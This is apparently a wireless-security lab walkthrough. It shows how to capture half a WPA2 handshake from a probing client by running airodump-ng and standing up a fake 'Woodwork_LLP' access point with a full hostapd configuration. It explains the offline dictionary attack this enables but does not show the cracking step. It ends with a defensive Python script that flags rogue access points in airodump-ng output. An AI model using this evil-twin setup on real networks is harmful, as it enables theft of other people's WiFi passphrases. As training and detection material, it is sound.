AP-less WPA2-PSK Cracking

Two dual-band monitor mode capable WiFi interfaces are present on the user machine. There is a client device probing for a WPA2-PSK SSID "Woodwork_LLP".

Objective: Figure out the network pre-shared passphrase of Woodwork_LLP!

After placing the device into monitor mode and firing up airodump-ng, you can see that a client is probing.

It is important to note that, as the real pre-shared passphrase is not known, the device will never be able to connect successfully to the fake SSID. While it tries to connect, however, half of the 4-way handshake can be captured, and that is sufficient for launching a dictionary attack on the network: the MIC the client sends in its handshake message is keyed from the passphrase-derived PMK, so candidate passphrases can be tested offline against it.

Run airodump-ng wlan0 -c 6 -w capture on the first interface to lock it to channel 6 and write the capture to files prefixed "capture".

It is expected that nothing (or just the probes from the client) shows up in the airodump-ng output at this point.

Create the fake AP on the second interface with the following hostapd configuration:

interface=wlan1
hw_mode=g
channel=6
driver=nl80211
ssid=Woodwork_LLP
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=123456789

The client won't be able to connect, as the passphrase is incorrect, but the attempt is enough to capture the handshake.
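As an added example (not part of the original page), here is the defender-side check for the scenario above: parse airodump-ng's CSV output and flag any BSSID outside an allowlist that is advertising an SSID you own while unassociated clients are still probing for it. The CSV sample, the MAC addresses and the KNOWN_BSSIDS allowlist are constructed for the example.

```python
import csv
import io

# Constructed airodump-ng style CSV (not a real capture): AP section, blank line,
# station section. DE:AD:BE:EF:00:02 plays the fake AP from the walkthrough.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -45, 120, 0, 0. 0. 0. 0, 12, Woodwork_LLP,
DE:AD:BE:EF:00:02, 2024-01-01 10:03:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -30, 40, 0, 0. 0. 0. 0, 12, Woodwork_LLP,
11:22:33:44:55:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, WPA2, CCMP, PSK, -70, 200, 0, 0. 0. 0. 0, 7, Guest-5G,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CA:FE:00:00:00:01, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -50, 15, (not associated), Woodwork_LLP
"""

# Hypothetical allowlist: the BSSIDs legitimately allowed to advertise each SSID.
KNOWN_BSSIDS = {"Woodwork_LLP": {"AA:BB:CC:00:00:01"}}


def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts from airodump-ng CSV text."""
    ap_part, _, sta_part = text.partition("\n\n")
    aps, stations = [], []
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) >= 14 and row[0] != "BSSID":
            aps.append({"bssid": row[0], "channel": row[3], "essid": row[13]})
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) >= 7 and row[0] != "Station MAC":
            # several probed ESSIDs are comma separated, so keep every tail field
            stations.append({"mac": row[0], "bssid": row[5],
                             "probes": [p for p in row[6:] if p]})
    return aps, stations


def find_evil_twins(aps, stations, known):
    """Flag unknown BSSIDs advertising our SSID and clients still probing for it."""
    alerts = []
    advertised = {}
    for ap in aps:
        advertised.setdefault(ap["essid"], {})[ap["bssid"]] = ap["channel"]
    for essid, trusted in known.items():
        rogue = {b: ch for b, ch in advertised.get(essid, {}).items()
                 if b not in trusted}
        for bssid, ch in sorted(rogue.items()):
            alerts.append(f"rogue AP {bssid} on channel {ch} advertising {essid!r}")
        probing = [s["mac"] for s in stations
                   if s["bssid"] == "(not associated)" and essid in s["probes"]]
        if rogue and probing:
            alerts.append(f"{len(probing)} unassociated client(s) probing for "
                          f"{essid!r} while a rogue AP is present")
    return alerts
```

Run it against the CSV that airodump-ng writes alongside the capture (the -w prefix plus -01.csv) to get alerts for the rogue SSID and the still-probing clients.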
